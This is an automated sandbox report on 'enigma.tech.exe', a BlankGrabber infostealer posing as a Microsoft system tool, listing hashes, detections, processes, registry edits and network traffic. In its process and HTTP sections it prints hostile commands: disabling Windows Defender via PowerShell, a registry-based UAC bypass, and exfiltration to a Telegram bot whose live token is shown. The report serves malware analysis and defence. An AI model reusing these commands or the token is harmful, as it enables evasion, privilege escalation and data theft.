File name:

enigma.tech.exe

Full analysis: https://app.any.run/tasks/e9212f0c-de3f-4425-a39e-f70267591768
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker     >>>
Analysis date: October 03, 2024, 14:33:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
uac
evasion
telegram
blankgrabber
stealer
exfiltration
pyinstaller
discordgrabber
generic
ims-api
growtopia
susp-powershell
umbralstealer
upx
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

6F451425173B4AFD358FDB80A0E82D70

SHA1:

F36B9AEF8C1A8A60DA9E418190353541445D823F

SHA256:

920E6F84332A744CAFB917F6E94356E1FD247BEC36D85B06F8A7B80A942C5B96

SSDEEP:

98304:E6Cg6ombrO47fz9hluqG9yeFyOnace7EewAV33T/1GfFH42UPeOHWZiI0FGGHLwn:PANE/gi7yo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • BlankGrabber has been detected

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 1772)

    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 6572)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 2776)
      • MpCmdRun.exe (PID: 6196)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6028)
      • enigma.tech.exe (PID: 2032)

    • Windows Defender preferences modified via 'Set-MpPreference'

      • cmd.exe (PID: 2776)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2080)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4472)

    • UMBRALSTEALER has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • BLANKGRABBER has been detected (SURICATA)

      • enigma.tech.exe (PID: 2032)

    • Stealers network behavior

      • enigma.tech.exe (PID: 2032)

    • GROWTOPIA has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • DISCORDGRABBER has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

  • SUSPICIOUS

    • Starts a Microsoft application from unusual location

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Process drops legitimate windows executable

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • The process drops C-runtime libraries

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Executable content was dropped or overwritten

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)
      • csc.exe (PID: 6284)

    • Process drops python dynamic module

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Application launched itself

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Starts CMD.EXE for commands execution

      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 2032)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2028)
      • cmd.exe (PID: 1060)
      • cmd.exe (PID: 4056)

    • Changes default file association

      • reg.exe (PID: 1772)

    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 3324)
      • cmd.exe (PID: 6916)

    • Found strings related to reading or modifying Windows Defender settings

      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 2032)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 2776)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2776)
      • cmd.exe (PID: 6028)
      • cmd.exe (PID: 4472)
      • cmd.exe (PID: 2352)
      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 6644)
      • cmd.exe (PID: 7140)

    • Get information on the list of running processes

      • enigma.tech.exe (PID: 2032)
      • cmd.exe (PID: 6556)
      • cmd.exe (PID: 2224)
      • cmd.exe (PID: 4664)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 3324)
      • cmd.exe (PID: 6760)
      • cmd.exe (PID: 4712)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 2776)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6264)
      • cmd.exe (PID: 6292)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6028)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 4472)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4472)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 4472)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6284)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6436)

    • Checks for external IP

      • svchost.exe (PID: 2256)
      • enigma.tech.exe (PID: 2032)

    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 3396)

    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 6028)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • enigma.tech.exe (PID: 2032)

  • INFO

    • Create files in a temporary directory

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Checks supported languages

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Reads the computer name

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • The process uses the downloaded file

      • cmd.exe (PID: 1712)

    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 6572)
      • WMIC.exe (PID: 6008)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 652)

    • PyInstaller has been detected (YARA)

      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • UPX packer has been detected

      • enigma.tech.exe (PID: 2032)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • enigma.tech.exe (PID: 2032)

    • Attempting to use instant messaging service

      • enigma.tech.exe (PID: 2032)
      • svchost.exe (PID: 2256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2032) enigma.tech.exe
Telegram-Tokens (1)7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ
Telegram-Info-Links
7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ
Get info about bothttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getMe
Get incoming updateshttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getUpdates
Get webhookhttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/deleteWebhook?drop_pending_updates=true
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:09:30 13:49:51+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.4
CodeSize: 172032
InitializedDataSize: 94208
UninitializedDataSize: -
EntryPoint: 0xcdb0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.22621.2506
ProductVersionNumber: 10.0.22621.2506
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: System Clone Tool
FileVersion: 10.0.22621.2506 (WinBuild.160101.0800)
InternalName: Setupcl.EXE
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: Setupcl.EXE
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.22621.2506
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
207
Monitored processes
91
Malicious processes
8
Suspicious processes
3

Behavior graph

Click at the process to see the details
start #BLANKGRABBER enigma.tech.exe enigma.tech.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe THREAT enigma.tech.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER enigma.tech.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs powershell.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
376powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
488"C:\Users\admin\Desktop\enigma.tech.exe" C:\Users\admin\Desktop\enigma.tech.exe
ComputerDefaults.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
System Clone Tool
Exit code:
0
Version:
10.0.22621.2506 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\enigma.tech.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
652mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ready!', 0, 'lxrd.', 48+16);close()"C:\Windows\System32\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
908C:\WINDOWS\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ready!', 0, 'lxrd.', 48+16);close()""C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1060C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1308wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:textC:\Windows\System32\wevtutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Eventing Command Line Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wevtutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
1568"C:\Users\admin\Desktop\enigma.tech.exe" C:\Users\admin\Desktop\enigma.tech.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
System Clone Tool
Exit code:
0
Version:
10.0.22621.2506 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\enigma.tech.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1656tasklist /FO LISTC:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1712C:\WINDOWS\system32\cmd.exe /c "computerdefaults --nouacbypass"C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1772reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
43 082
Read events
43 073
Write events
5
Delete events
4

Modification events

(PID) Process:(1772) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)
Value:
Executable files
37
Suspicious files
8
Text files
36
Unknown types
6

Dropped files

PID
Process
Filename
Type
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_hashlib.pydexecutable
MD5:7EDB6C172C0E44913E166ABB50E6FBA6
SHA256:258AD0D7E8B2333B4B260530E14EBE6ABD12CAE0316C4549E276301E5865B531
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_queue.pydexecutable
MD5:F1E7C157B687C7E041DEADD112D61316
SHA256:D92EADB90AED96ACB5FAC03BC79553F4549035EA2E9D03713D420C236CD37339
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_ctypes.pydexecutable
MD5:7ECC651B0BCF9B93747A710D67F6C457
SHA256:B43963B0883BA2E99F2B7DD2110D33063071656C35E6575FCA203595C1C32B1A
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_bz2.pydexecutable
MD5:83B5D1943AC896A785DA5343614B16BC
SHA256:BF79DDBFA1CC4DF7987224EE604C71D9E8E7775B9109BF4FF666AF189D89398A
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\libcrypto-1_1.dllexecutable
MD5:E5AECAF59C67D6DD7C7979DFB49ED3B0
SHA256:9D2257D0DE8172BCC8F2DBA431EB91BD5B8AC5A9CBE998F1DCAC0FAC818800B1
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\python311.dllexecutable
MD5:1E76961CA11F929E4213FCA8272D0194
SHA256:8A0C27F9E5B2EFD54E41D7E7067D7CB1C6D23BAE5229F6D750F89568566227B0
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\libssl-1_1.dllexecutable
MD5:7BCB0F97635B91097398FD1B7410B3BC
SHA256:ABE8267F399A803224A1F3C737BCA14DEE2166BA43C1221950E2FBCE1314479E
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\select.pydexecutable
MD5:938C814CC992FE0BA83C6F0C78D93D3F
SHA256:9C9B62C84C2373BA509C42ADBCA01AD184CD525A81CCBCC92991E0F84735696E
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\rar.exeexecutable
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_socket.pydexecutable
MD5:57DC6A74A8F2FAACA1BA5D330D7C8B4B
SHA256:5B73B9EA327F7FB4CEFDDD65D6050CDEC2832E2E634FCBF4E98E0F28D75AD7CA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
31
DNS requests
10
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
216.58.206.35:443
https://gstatic.com/generate_204
unknown
2356
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2032
enigma.tech.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
2032
enigma.tech.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
POST
200
149.154.167.99:443
https://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/sendDocument
unknown
binary
1.67 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2356
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
2356
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2032
enigma.tech.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
shared
2356
svchost.exe
52.167.249.196:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2032
enigma.tech.exe
216.58.212.131:443
gstatic.com
GOOGLE
US
whitelisted
2032
enigma.tech.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
shared

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 52.167.249.196
whitelisted
google.com
  • 142.250.185.238
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
blank-y4ite.in
unknown
ip-api.com
  • 208.95.112.1
shared
gstatic.com
  • 216.58.212.131
whitelisted
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
2256
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2256
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2032
enigma.tech.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2256
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2256
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2032
enigma.tech.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2032
enigma.tech.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
2032
enigma.tech.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Successful Credential Theft Detected
SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
enigma.tech.exe